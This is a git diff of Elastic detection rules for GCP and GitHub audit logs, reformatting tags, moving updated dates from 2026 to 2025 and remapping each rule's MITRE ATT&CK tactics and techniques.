Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Log Auditing", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -75,13 +82,14 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Subscriber.DeleteSubsc [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml index 796f221eb75..01e2afac043 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_pub_sub_topic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/18" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -65,7 +65,14 @@ references = ["https://cloud.google.com/pubsub/docs/overview"] risk_score = 21 rule_id = "3202e172-01b1-4738-a932-d024c514ba72" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Log Auditing", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -76,13 +83,14 @@ event.dataset:gcp.audit and event.action:google.pubsub.v*.Publisher.DeleteTopic [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml index ae4dd9b718b..66e67424205 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_storage_bucket_permissions_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -64,7 +64,14 @@ references = ["https://cloud.google.com/storage/docs/access-control/iam-permissi risk_score = 47 rule_id = "2326d1b2-9acf-4dee-bd21-867ea7378b4d" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Identity and Access Audit", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -75,36 +82,14 @@ event.dataset:gcp.audit and event.action:"storage.setIamPermissions" and event.o [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1222" +name = "File and Directory Permissions Modification" +reference = "https://attack.mitre.org/techniques/T1222/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml index 7763e3925b8..49efa174d6f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_network_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -64,7 +64,14 @@ references = ["https://cloud.google.com/vpc/docs/vpc"] risk_score = 47 rule_id = "c58c3081-2e1d-4497-8491-e73a45d1a6d6" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Configuration Audit", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -75,13 +82,19 @@ event.dataset:gcp.audit and event.action:v*.compute.networks.delete and event.ou [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml index 68be3764092..8ae59e5172f 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -83,18 +83,19 @@ event.dataset:gcp.audit and event.action:(v*.compute.routes.insert or "beta.comp [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml index 61e82cd4529..2dbfe20dffd 100644 --- a/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml +++ b/rules/integrations/gcp/defense_evasion_gcp_virtual_private_cloud_route_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -83,18 +83,19 @@ event.dataset:gcp.audit and event.action:v*.compute.routes.delete and event.outc [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1578" -name = "Modify Cloud Compute Infrastructure" -reference = "https://attack.mitre.org/techniques/T1578/" - +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1578.005" -name = "Modify Cloud Compute Configurations" -reference = "https://attack.mitre.org/techniques/T1578/005/" +id = "T1562.007" +name = "Disable or Modify Cloud Firewall" +reference = "https://attack.mitre.org/techniques/T1562/007/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml index f75f349993b..cff4a666a38 100644 --- a/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml +++ b/rules/integrations/gcp/exfiltration_gcp_logging_sink_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -66,7 +66,14 @@ references = ["https://cloud.google.com/logging/docs/export#how_sinks_work"] risk_score = 21 rule_id = "184dfe52-2999-42d9-b9d1-d1ca54495a61" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Log Auditing", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Log Auditing", + "Tactic: Exfiltration", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -77,18 +84,14 @@ event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.Updat [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1537" +name = "Transfer Data to Cloud Account" +reference = "https://attack.mitre.org/techniques/T1537/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + diff --git a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml index 206d58ad008..d26fdfad9fe 100644 --- a/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml +++ b/rules/integrations/gcp/initial_access_gcp_iam_custom_role_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -64,7 +64,14 @@ references = ["https://cloud.google.com/iam/docs/understanding-custom-roles"] risk_score = 47 rule_id = "aa8007f0-d1df-49ef-8520-407857594827" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Identity and Access Audit", + "Tactic: Initial Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -75,36 +82,26 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateRole and even [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/gcp/ml_gcp_error_message_spike.toml b/rules/integrations/gcp/ml_gcp_error_message_spike.toml index b73fbb0215c..5a8f5a9bd87 100644 --- a/rules/integrations/gcp/ml_gcp_error_message_spike.toml +++ b/rules/integrations/gcp/ml_gcp_error_message_spike.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 @@ -48,12 +48,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "a4b740e4-be17-4048-9aa4-1e6f42b455b1" severity = "low" -tags = ["Domain: Cloud", "Tactic: Discovery", "Tactic: Lateral Movement", "Tactic: Privilege Escalation", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -64,10 +77,13 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -77,10 +93,3 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/gcp/ml_gcp_rare_error_code.toml b/rules/integrations/gcp/ml_gcp_rare_error_code.toml index 9548cd29f37..00a36b532e7 100644 --- a/rules/integrations/gcp/ml_gcp_rare_error_code.toml +++ b/rules/integrations/gcp/ml_gcp_rare_error_code.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 @@ -59,3 +59,60 @@ tags = [ ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml index 51d17298fe6..6ba99513f42 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 @@ -49,12 +49,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "f20d1782-e783-4ed0-a0c4-946899a98a7c" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -64,8 +77,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml index d74d7edbfd5..c151731755a 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 50 @@ -49,12 +49,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "dcbd07f8-bd6e-4bb4-ac5d-cec1927ea88f" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -64,8 +77,3 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml index 40c44ea56b8..0474776c35d 100644 --- a/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml +++ b/rules/integrations/gcp/ml_gcp_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["gcp"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2025/11/21" [rule] anomaly_threshold = 75 @@ -48,12 +48,25 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "2e08f34c-691c-497e-87de-5d794a1b2a53" severity = "low" -tags = ["Domain: Cloud", "Tactic: Initial Access", "Data Source: GCP", "Data Source: GCP Audit Logs", "Data Source: Google Cloud Platform", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: GCP Audit Logs", + "Data Source: Google Cloud Platform", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -64,7 +77,41 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.007" +name = "Cloud Services" +reference = "https://attack.mitre.org/techniques/T1021/007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" diff --git a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml index 2a88a807bf8..6060132006a 100644 --- a/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml +++ b/rules/integrations/gcp/persistence_gcp_iam_service_account_key_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -68,7 +68,14 @@ references = [ risk_score = 21 rule_id = "9890ee61-d061-403d-9bf6-64934c51f638" severity = "low" -tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: GCP", "Data Source: Google Cloud Platform", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: GCP", + "Data Source: Google Cloud Platform", + "Use Case: Identity and Access Audit", + "Tactic: Persistence", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -79,13 +86,14 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.DeleteServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml index 271bbc2248a..84d9cc8278b 100644 --- a/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml +++ b/rules/integrations/gcp/persistence_gcp_key_created_for_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/21" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -87,18 +87,14 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/gcp/persistence_gcp_service_account_created.toml b/rules/integrations/gcp/persistence_gcp_service_account_created.toml index 0bace523e6a..64c798841be 100644 --- a/rules/integrations/gcp/persistence_gcp_service_account_created.toml +++ b/rules/integrations/gcp/persistence_gcp_service_account_created.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/22" integration = ["gcp"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -83,18 +83,14 @@ event.dataset:gcp.audit and event.action:google.iam.admin.v*.CreateServiceAccoun [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.003" -name = "Cloud Account" -reference = "https://attack.mitre.org/techniques/T1136/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml index b99c21b1bb6..505b0df6390 100644 --- a/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml +++ b/rules/integrations/github/defense_evasion_github_protected_branch_settings_changed.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -72,13 +72,19 @@ configuration where event.dataset == "github.audit" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/github/execution_github_app_deleted.toml b/rules/integrations/github/execution_github_app_deleted.toml index 0358e321943..5bf9ba190ef 100644 --- a/rules/integrations/github/execution_github_app_deleted.toml +++ b/rules/integrations/github/execution_github_app_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -50,7 +50,13 @@ GitHub Apps are integrations that extend GitHub's functionality, often used to a risk_score = 21 rule_id = "fd01b949-81be-46d5-bcf8-284395d5f56d" severity = "low" -tags = ["Domain: Cloud", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Github", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Github", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -61,13 +67,14 @@ configuration where event.dataset == "github.audit" and github.category == "inte [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" +id = "T1648" +name = "Serverless Execution" +reference = "https://attack.mitre.org/techniques/T1648/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml index 91e435a1640..723fabe54ae 100644 --- a/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml +++ b/rules/integrations/github/execution_github_high_number_of_cloned_repos_from_pat.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -52,7 +52,14 @@ Personal Access Tokens (PATs) facilitate automated access to GitHub repositories risk_score = 21 